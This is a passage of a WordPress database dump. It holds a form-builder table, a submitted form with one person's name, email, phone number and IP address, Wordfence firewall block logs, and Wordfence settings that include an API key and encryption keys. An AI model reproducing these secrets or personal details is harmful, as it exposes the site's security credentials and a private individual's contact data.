class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;divider\\&quot; data-batchid=\\&quot;8\\&quot; id=\\&quot;vform-group8\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;hr&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;date\\&quot; data-batchid=\\&quot;12\\&quot; id=\\&quot;vform-group12\\&quot; style=\\&quot;position: relative; left: 0px; top: 0px;\\&quot;&gt;&lt;label class=\\&quot;vform-heading\\&quot;&gt;&lt;span class=\\&quot;text\\&quot;&gt;Date of Birth (optinal)&lt;/span&gt;&lt;span class=\\&quot;required\\&quot;&gt;*&lt;/span&gt;&lt;/label&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-date\\&quot;&gt;&lt;input type=\\&quot;date\\&quot; name=\\&quot;date[]\\&quot; placeholder=\\&quot;\\&quot; class=\\&quot;primary-input\\&quot; disabled=\\&quot;\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-description\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-group ui-sortable-handle\\&quot; data-type=\\&quot;submit\\&quot; data-batchid=\\&quot;11\\&quot; id=\\&quot;vform-group11\\&quot;&gt;&lt;div class=\\&quot;vform-cpy-del\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-properties\\&quot;&gt;&lt;i class=\\&quot;fa fa-cog\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Properties&lt;/span&gt;&lt;/button&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Remove\\&quot;&gt;&lt;i class=\\&quot;fa fa-trash\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Delete&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-cpy-del dupleftonly\\&quot;&gt;&lt;button type=\\&quot;button\\&quot; class=\\&quot;sc-Duplicate\\&quot;&gt;&lt;i class=\\&quot;fa fa-clone\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;/i&gt;&lt;span&gt;Duplicate&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class=\\&quot;vform-format-selected\\&quot;&gt;&lt;input type=\\&quot;submit\\&quot; class=\\&quot;vform-main-submit\\&quot; value=\\&quot;Submit\\&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;','true','message','&lt;p&gt;Thanks, See You in Cairo&lt;/p&gt;','1','ay.zaghweb@gmail.com','Gsw2023 form','Admin','','','{all_fields}','2023-08-22 23:07:37');
/*!40000 ALTER TABLE `dnctiavkr_vform` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_vform_userinput`
--

DROP TABLE IF EXISTS `dnctiavkr_vform_userinput`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_vform_userinput` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `formid` varchar(100) NOT NULL,
  `maindatabody` mediumtext NOT NULL,
  `ip` varchar(300) DEFAULT NULL,
  `browser` varchar(300) DEFAULT NULL,
  `currentdate` varchar(300) DEFAULT NULL,
  `timezone` varchar(300) DEFAULT NULL,
  `currentdate_part2` varchar(300) DEFAULT NULL,
  `usertimetakes` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_vform_userinput`
--

LOCK TABLES `dnctiavkr_vform_userinput` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_vform_userinput` DISABLE KEYS */;
INSERT INTO `dnctiavkr_vform_userinput` VALUES
(1,'1','firstname=ayman&middlename=A&lastname=elzagh&singleline=egyptian%7E6544%7Eaaaaasss&paragraph=&dropdown=&multiplechoice=Dr.&checkbox=&number=&email=ay.zaghweb%40gmail.com&websiteurl=&full_address=&city_name=&state_name=&zip_code=&shipping_country=&phone=01210007979&password=&datetime=2023-08-08T04%3A00&termscondition=&date=&time=&month=&week=&color=','197.121.161.233','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.188','August 22, 2023, 10:57 pm','UTC','Wed Aug 23 2023 01:58:30 GMT+0300 (Arabian Standard Time)','{\\\"days\\\":0,\\\"hours\\\":0,\\\"minute\\\":1,\\\"second\\\":12}');
/*!40000 ALTER TABLE `dnctiavkr_vform_userinput` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_vfsubscr`
--

DROP TABLE IF EXISTS `dnctiavkr_vfsubscr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_vfsubscr` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `subscription` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_vfsubscr`
--

LOCK TABLES `dnctiavkr_vfsubscr` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_vfsubscr` DISABLE KEYS */;
INSERT INTO `dnctiavkr_vfsubscr` VALUES
(1,1);
/*!40000 ALTER TABLE `dnctiavkr_vfsubscr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfblockediplog`
--

DROP TABLE IF EXISTS `dnctiavkr_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfblockediplog`
--

LOCK TABLES `dnctiavkr_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfblockediplog` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfblockediplog` VALUES
('\0\0\0\0\0\0\0\0\0\0\"','US',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0R','CN',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0g','HK',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0g*','BD',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0hZ','CA',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0%.','US',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0 ','GB',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0s','CZ',1,19582,'brute'),
('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19582,'brute');
/*!40000 ALTER TABLE `dnctiavkr_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfblocks7`
--

DROP TABLE IF EXISTS `dnctiavkr_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfblocks7`
--

LOCK TABLES `dnctiavkr_wfblocks7` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfblocks7` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfblocks7` VALUES
(1,2,'\0\0\0\0\0\0\0\0\0\0 ',1691937376,'Blocked by Wordfence Security Network',1691937376,1,1691937976,NULL),
(2,2,'\0\0\0\0\0\0\0\0\0\0\"',1691937452,'Blocked by Wordfence Security Network',1691937452,1,1691938052,NULL),
(3,2,'\0\0\0\0\0\0\0\0\0\0%.',1691937989,'Blocked by Wordfence Security Network',1691937989,1,1691938589,NULL),
(4,2,'\0\0\0\0\0\0\0\0\0\0s',1691938973,'Blocked by Wordfence Security Network',1691938973,1,1691939573,NULL),
(5,2,'\0\0\0\0\0\0\0\0\0\0g',1691939749,'Blocked by Wordfence Security Network',1691939749,1,1691940349,NULL),
(6,2,'\0\0\0\0\0\0\0\0\0\0g*',1691939914,'Blocked by Wordfence Security Network',1691939914,1,1691940514,NULL),
(7,2,'\0\0\0\0\0\0\0\0\0\0՘',1691940145,'Blocked by Wordfence Security Network',1691940145,1,1691940745,NULL),
(8,2,'\0\0\0\0\0\0\0\0\0\0hZ',1691940569,'Blocked by Wordfence Security Network',1691940569,1,1691941169,NULL),
(9,2,'\0\0\0\0\0\0\0\0\0\0R',1691940760,'Blocked by Wordfence Security Network',1691940760,1,1691941360,NULL),
(10,2,'\0\0\0\0\0\0\0\0\0\0>f',1691941919,'Blocked by Wordfence Security Network',1691941919,1,1691942519,NULL);
/*!40000 ALTER TABLE `dnctiavkr_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfconfig`
--

DROP TABLE IF EXISTS `dnctiavkr_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfconfig`
--

LOCK TABLES `dnctiavkr_wfconfig` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfconfig` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wfconfig` VALUES
('activatingIP','62.114.114.180','yes'),
('actUpdateInterval','2','yes'),
('addCacheComment','0','yes'),
('advancedCommentScanning','1','yes'),
('ajaxWatcherDisabled_admin','0','yes'),
('ajaxWatcherDisabled_front','0','yes'),
('alertEmails','ay.zagh@gmail.com','yes'),
('alertOn_adminLogin','1','yes'),
('alertOn_block','1','yes'),
('alertOn_breachLogin','1','yes'),
('alertOn_firstAdminLoginOnly','0','yes'),
('alertOn_firstNonAdminLoginOnly','0','yes'),
('alertOn_loginLockout','1','yes'),
('alertOn_lostPasswdForm','1','yes'),
('alertOn_nonAdminLogin','0','yes'),
('alertOn_scanIssues','1','yes'),
('alertOn_severityLevel','25','yes'),
('alertOn_throttle','0','yes'),
('alertOn_update','0','yes'),
('alertOn_wafDeactivated','1','yes'),
('alertOn_wordfenceDeactivated','1','yes'),
('alert_maxHourly','0','yes'),
('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),
('allowed404s6116Migration','1','yes'),
('allowHTTPSCaching','0','yes'),
('allowLegacy2FA','0','yes'),
('allowMySQLi','1','yes'),
('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1692143400;s:4:\"args\";a:1:{i:0;i:1692143400;}}i:1;a:2:{s:9:\"timestamp\";i:1692402600;s:4:\"args\";a:1:{i:0;i:1692402600;}}}','yes'),
('apiKey','40460a3233df96877acbbaa25efd335369cf26016ebb10417ae80c99b1be90fbc49fe072ecfb58a54b1f1fe210d23d4d','yes'),
('autoBlockScanners','1','yes'),
('autoUpdate','0','yes'),
('autoUpdateAttempts','0','yes'),
('bannedURLs','','yes'),
('blockCustomText','','yes'),
('blockedTime','300','yes'),
('blocks702Migration','1','yes'),
('cacheType','disabled','yes'),
('cbl_action','block','yes'),
('cbl_bypassRedirDest','','yes'),
('cbl_bypassRedirURL','','yes'),
('cbl_bypassViewURL','','yes'),
('cbl_cookieVal','64d8ea5ca50e1','yes'),
('cbl_loggedInBlocked','','yes'),
('cbl_redirURL','','yes'),
('cbl_restOfSiteBlocked','1','yes'),
('checkSpamIP','1','yes'),
('config701Migration','1','yes'),
('config720Migration','1','yes'),
('currentCronKey','','yes'),
('dashboardData','a:4:{s:9:\"generated\";i:1691940455;s:3:\"tdf\";a:3:{s:9:\"community\";i:5621;s:7:\"premium\";i:5693;s:9:\"blacklist\";i:18884;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1691852400;s:1:\"c\";i:10905541;}i:1;a:2:{s:1:\"t\";i:1691856000;s:1:\"c\";i:11000055;}i:2;a:2:{s:1:\"t\";i:1691859600;s:1:\"c\";i:16034178;}i:3;a:2:{s:1:\"t\";i:1691863200;s:1:\"c\";i:17992761;}i:4;a:2:{s:1:\"t\";i:1691866800;s:1:\"c\";i:16567963;}i:5;a:2:{s:1:\"t\";i:1691870400;s:1:\"c\";i:15906805;}i:6;a:2:{s:1:\"t\";i:1691874000;s:1:\"c\";i:15309122;}i:7;a:2:{s:1:\"t\";i:1691877600;s:1:\"c\";i:15015501;}i:8;a:2:{s:1:\"t\";i:1691881200;s:1:\"c\";i:14550679;}i:9;a:2:{s:1:\"t\";i:1691884800;s:1:\"c\";i:14165917;}i:10;a:2:{s:1:\"t\";i:1691888400;s:1:\"c\";i:13701610;}i:11;a:2:{s:1:\"t\";i:1691892000;s:1:\"c\";i:15594173;}i:12;a:2:{s:1:\"t\";i:1691895600;s:1:\"c\";i:19735285;}i:13;a:2:{s:1:\"t\";i:1691899200;s:1:\"c\";i:21170225;}i:14;a:2:{s:1:\"t\";i:1691902800;s:1:\"c\";i:21109617;}i:15;a:2:{s:1:\"t\";i:1691906400;s:1:\"c\";i:18577347;}i:16;a:2:{s:1:\"t\";i:1691910000;s:1:\"c\";i:17364271;}i:17;a:2:{s:1:\"t\";i:1691913600;s:1:\"c\";i:16575033;}i:18;a:2:{s:1:\"t\";i:1691917200;s:1:\"c\";i:15745919;}i:19;a:2:{s:1:\"t\";i:1691920800;s:1:\"c\";i:15381830;}i:20;a:2:{s:1:\"t\";i:1691924400;s:1:\"c\";i:15142838;}i:21;a:2:{s:1:\"t\";i:1691928000;s:1:\"c\";i:13913441;}i:22;a:2:{s:1:\"t\";i:1691931600;s:1:\"c\";i:10557039;}i:23;a:2:{s:1:\"t\";i:1691935200;s:1:\"c\";i:10099816;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1691280000;s:1:\"c\";i:363583272;}i:1;a:2:{s:1:\"t\";i:1691366400;s:1:\"c\";i:366640513;}i:2;a:2:{s:1:\"t\";i:1691452800;s:1:\"c\";i:379154742;}i:3;a:2:{s:1:\"t\";i:1691539200;s:1:\"c\";i:332897271;}i:4;a:2:{s:1:\"t\";i:1691625600;s:1:\"c\";i:376528189;}i:5;a:2:{s:1:\"t\";i:1691712000;s:1:\"c\";i:368729794;}i:6;a:2:{s:1:\"t\";i:1691798400;s:1:\"c\";i:317537775;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1689292800;s:1:\"c\";i:317321073;}i:1;a:2:{s:1:\"t\";i:1689379200;s:1:\"c\";i:245071345;}i:2;a:2:{s:1:\"t\";i:1689465600;s:1:\"c\";i:302713240;}i:3;a:2:{s:1:\"t\";i:1689552000;s:1:\"c\";i:314635868;}i:4;a:2:{s:1:\"t\";i:1689638400;s:1:\"c\";i:338786397;}i:5;a:2:{s:1:\"t\";i:1689724800;s:1:\"c\";i:330981110;}i:6;a:2:{s:1:\"t\";i:1689811200;s:1:\"c\";i:375563500;}i:7;a:2:{s:1:\"t\";i:1689897600;s:1:\"c\";i:358989781;}i:8;a:2:{s:1:\"t\";i:1689984000;s:1:\"c\";i:390249252;}i:9;a:2:{s:1:\"t\";i:1690070400;s:1:\"c\";i:334432151;}i:10;a:2:{s:1:\"t\";i:1690156800;s:1:\"c\";i:369685700;}i:11;a:2:{s:1:\"t\";i:1690243200;s:1:\"c\";i:345252725;}i:12;a:2:{s:1:\"t\";i:1690329600;s:1:\"c\";i:349172709;}i:13;a:2:{s:1:\"t\";i:1690416000;s:1:\"c\";i:290697441;}i:14;a:2:{s:1:\"t\";i:1690502400;s:1:\"c\";i:300170369;}i:15;a:2:{s:1:\"t\";i:1690588800;s:1:\"c\";i:300856563;}i:16;a:2:{s:1:\"t\";i:1690675200;s:1:\"c\";i:342600713;}i:17;a:2:{s:1:\"t\";i:1690761600;s:1:\"c\";i:342553555;}i:18;a:2:{s:1:\"t\";i:1690848000;s:1:\"c\";i:320326617;}i:19;a:2:{s:1:\"t\";i:1690934400;s:1:\"c\";i:336660098;}i:20;a:2:{s:1:\"t\";i:1691020800;s:1:\"c\";i:398475816;}i:21;a:2:{s:1:\"t\";i:1691107200;s:1:\"c\";i:339526575;}i:22;a:2:{s:1:\"t\";i:1691193600;s:1:\"c\";i:308904356;}i:23;a:2:{s:1:\"t\";i:1691280000;s:1:\"c\";i:363583272;}i:24;a:2:{s:1:\"t\";i:1691366400;s:1:\"c\";i:366640513;}i:25;a:2:{s:1:\"t\";i:1691452800;s:1:\"c\";i:379154742;}i:26;a:2:{s:1:\"t\";i:1691539200;s:1:\"c\";i:332897271;}i:27;a:2:{s:1:\"t\";i:1691625600;s:1:\"c\";i:376528189;}i:28;a:2:{s:1:\"t\";i:1691712000;s:1:\"c\";i:368729794;}i:29;a:2:{s:1:\"t\";i:1691798400;s:1:\"c\";i:317537775;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:819999667;}i:1;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:355356725;}i:2;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:261533242;}i:3;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:188456458;}i:4;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:145952780;}i:5;a:2:{s:2:\"cd\";s:2:\"NL\";s:2:\"ct\";i:102523041;}i:6;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:94254748;}i:7;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:62483765;}i:8;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:56957482;}i:9;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:50717320;}}}}','yes'),
('dbTest','a:1:{s:5:\"nonce\";s:64:\"28f66be95a22caca904ff4f1b903ee6cf37e4c9fea98751e102afb344cbe698e\";}','no'),
('dbVersion','10.3.36-MariaDB','yes'),
('debugOn','0','yes'),
('deleteTablesOnDeact','0','yes'),
('detectProxyNextCheck','1692542172','no'),
('detectProxyNonce','1e300060f2e3bf80fd8f505f7d3cf6bd75d859525ea8f3ff1dec3af9c435dd9d','no'),
('detectProxyRecommendation','','no'),
('diagnosticsWflogsRemovalHistory','[]','no'),
('disableCodeExecutionUploads','0','yes'),
('disableConfigCaching','0','yes'),
('disableWAFIPBlocking','0','yes'),
('disclosureStates','a:1:{s:26:\"wf-scanner-options-general\";b:1;}','yes'),
('dismissAutoPrependNotice','0','yes'),
('displayAutomaticBlocks','1','yes'),
('displayTopLevelBlocking','0','yes'),
('displayTopLevelLiveTraffic','0','yes'),
('displayTopLevelOptions','1','yes'),
('emailedIssuesList','a:0:{}','yes'),
('email_summary_dashboard_widget_enabled','1','yes'),
('email_summary_enabled','1','yes'),
('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),
('email_summary_interval','weekly','yes'),
('enableRemoteIpLookup','1','yes'),
('encKey','5d78c3dae1525333','yes'),
('fileContentsGSB6315Migration','1','yes'),
('firewallEnabled','1','yes'),
('hasKeyConflict','0','yes'),
('howGetIPs','','yes'),
('howGetIPs_trusted_proxies','','yes'),
('isPaid','','yes'),
('keyType','free','yes'),
('lastAttackDataSendId','92','yes'),
('lastAttackDataSendTime','1691941980.872700','yes'),
('lastBlockAggregation','1691937371','yes'),
('lastDailyCron','1691937500','yes'),
('lastDashboardCheck','1691941455','yes'),
('lastNotificationID','7','no'),
('lastPermissionsTemplateCheck','1691937507','yes'),
('lastScanCompleted','ok','yes'),
('lastScanFailureType','','yes'),
('liveActivityPauseEnabled','1','yes'),
('liveTrafficEnabled','0','yes'),
('liveTraf_displayExpandedRecords','0','no'),
('liveTraf_ignoreIPs','','yes'),
('liveTraf_ignorePublishers','1','yes'),
('liveTraf_ignoreUA','','yes'),
('liveTraf_ignoreUsers','','yes'),
('liveTraf_maxAge','30','yes'),
('liveTraf_maxRows','2000','yes'),
('loginSecurityEnabled','1','yes'),
('loginSec_blockAdminReg','1','yes'),
('loginSec_breachPasswds','admins','yes'),
('loginSec_breachPasswds_enabled','1','yes'),
('loginSec_countFailMins','240','yes'),
('loginSec_disableApplicationPasswords','1','yes'),
('loginSec_disableAuthorScan','1','yes'),
('loginSec_disableOEmbedAuthor','0','yes'),
('loginSec_enableSeparateTwoFactor','','yes'),
('loginSec_lockInvalidUsers','0','yes'),
('loginSec_lockoutMins','240','yes'),
('loginSec_maskLoginErrors','1','yes'),
('loginSec_maxFailures','20','yes'),
('loginSec_maxForgotPasswd','20','yes'),
('loginSec_requireAdminTwoFactor','0','yes'),
('loginSec_strongPasswds','pubs','yes'),
('loginSec_strongPasswds_enabled','1','yes'),
('loginSec_userBlacklist','','yes'),
('longEncKey','2b6c266239026c6ef9fabc47369e59c1034bd4f652f11d820ec7d473abc7dcd2','yes'),
('lowResourceScansEnabled','0','yes'),
('lowResourceScanWaitStep','','yes'),
('manualScanType','onceDaily','yes'),
('max404Crawlers','DISABLED','yes'),
('max404Crawlers_action','throttle','yes'),
('max404Humans','DISABLED','yes'),
('max404Humans_action','throttle','yes'),
('maxExecutionTime','0','yes'),
('maxGlobalRequests','DISABLED','yes'),
('maxGlobalRequests_action','throttle','yes'),
('maxMem','256','yes'),
('maxRequestsCrawlers','DISABLED','yes'),
('maxRequestsCrawlers_action','throttle','yes'),
('maxRequestsHumans','DISABLED','yes'),
('maxRequestsHumans_action','throttle','yes'),
('migration636_email_summary_excluded_directories','1','no'),
('needsNewTour_blocking','1','yes'),
('needsNewTour_dashboard','0','yes'),
('needsNewTour_firewall','1','yes'),
('needsNewTour_livetraffic','0','yes'),
('needsNewTour_loginsecurity','1','yes'),
('needsNewTour_scan','0','yes'),
('needsUpgradeTour_blocking','0','yes'),
('needsUpgradeTour_dashboard','0','yes'),
('needsUpgradeTour_firewall','0','yes'),
('needsUpgradeTour_livetraffic','0','yes'),
('needsUpgradeTour_loginsecurity','0','yes'),
('needsUpgradeTour_scan','0','yes'),
('neverBlockBG','neverBlockVerified','yes'),
('noc1ScanSchedule','a:2:{i:0;i:1692143400;i:1;i:1692402600;}','yes'),
('notification_blogHighlights','1','yes'),
('notification_productUpdates','1','yes'),
('notification_promotions','1','yes'),
('notification_scanStatus','1','yes'),
('notification_securityAlerts','1','yes'),
('notification_updatesNeeded','1','yes'),
('onboardingAttempt1','skipped','yes'),
('onboardingAttempt2','','no'),
('onboardingAttempt3','','no'),
('onboardingAttempt3Initial','0','yes'),
('onboardingDelayedAt','0','yes'),
('other_blockBadPOST','0','yes'),
('other_bypassLitespeedNoabort','0','yes'),
('other_hideWPVersion','0','yes'),
('other_pwStrengthOnUpdate','1','yes'),
('other_scanComments','1','yes'),
('other_scanOutside','0','yes'),
('other_WFNet','1','yes'),
('previousWflogsFileList','[\".htaccess\",\"attack-data.php\",\"config-livewaf.php\",\"config-synced.php\",\"config-transient.php\",\"config.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"rules.php\",\"template.php\"]','yes'),
('scanAjaxTestSuccessful','1','yes'),
('scanMonitorLastAttempt','1691937502','yes'),
('scanMonitorLastAttemptMode','quick','yes'),
('scanMonitorLastAttemptWasFork','','yes'),
('scanMonitorLastSuccess','1691937506','yes'),
('scanMonitorRemainingResumeAttempts','2','yes'),
('scansEnabled_checkGSB','1','yes'),
('scansEnabled_checkHowGetIPs','1','yes'),
('scansEnabled_checkReadableConfig','1','yes'),
('scansEnabled_comments','1','yes'),
('scansEnabled_core','1','yes'),
('scansEnabled_coreUnknown','1','yes'),
('scansEnabled_diskSpace','1','yes'),
('scansEnabled_fileContents','1','yes'),
('scansEnabled_fileContentsGSB','1','yes'),
('scansEnabled_geoipSupport','1','yes'),
('scansEnabled_highSense','0','yes'),
('scansEnabled_malware','1','yes'),
('scansEnabled_oldVersions','1','yes'),
('scansEnabled_options','1','yes'),
('scansEnabled_passwds','1','yes'),
('scansEnabled_plugins','0','yes'),
('scansEnabled_posts','1','yes'),
('scansEnabled_scanImages','0','yes'),
('scansEnabled_suspectedFiles','1','yes'),
('scansEnabled_suspiciousAdminUsers','1','yes'),
('scansEnabled_suspiciousOptions','1','yes'),
('scansEnabled_themes','0','yes'),
('scansEnabled_wafStatus','1','yes'),
('scansEnabled_wpscan_directoryListingEnabled','1','yes'),
('scansEnabled_wpscan_fullPathDisclosure','1','yes'),
('scanTime','1691937506.7091','yes'),
('scanType','standard','yes'),
('scan_exclude','','yes'),
('scan_force_ipv4_start','0','yes'),
('scan_include_extra','','yes'),
('scan_maxDuration','','yes'),
('scan_maxIssues','1000','yes'),
('scan_max_resume_attempts','2','yes'),
('schedMode','auto','yes'),
('schedStartHour','23','yes'),
('scheduledScansEnabled','1','yes'),
('serverDNS','1691937374;41028;174.138.186.50','yes'),
('showAdminBarMenu','1','yes'),
('showWfCentralUI','1','yes'),
('spamvertizeCheck','1','yes'),
('ssl_verify','1','yes'),
('startScansRemotely','0','yes'),
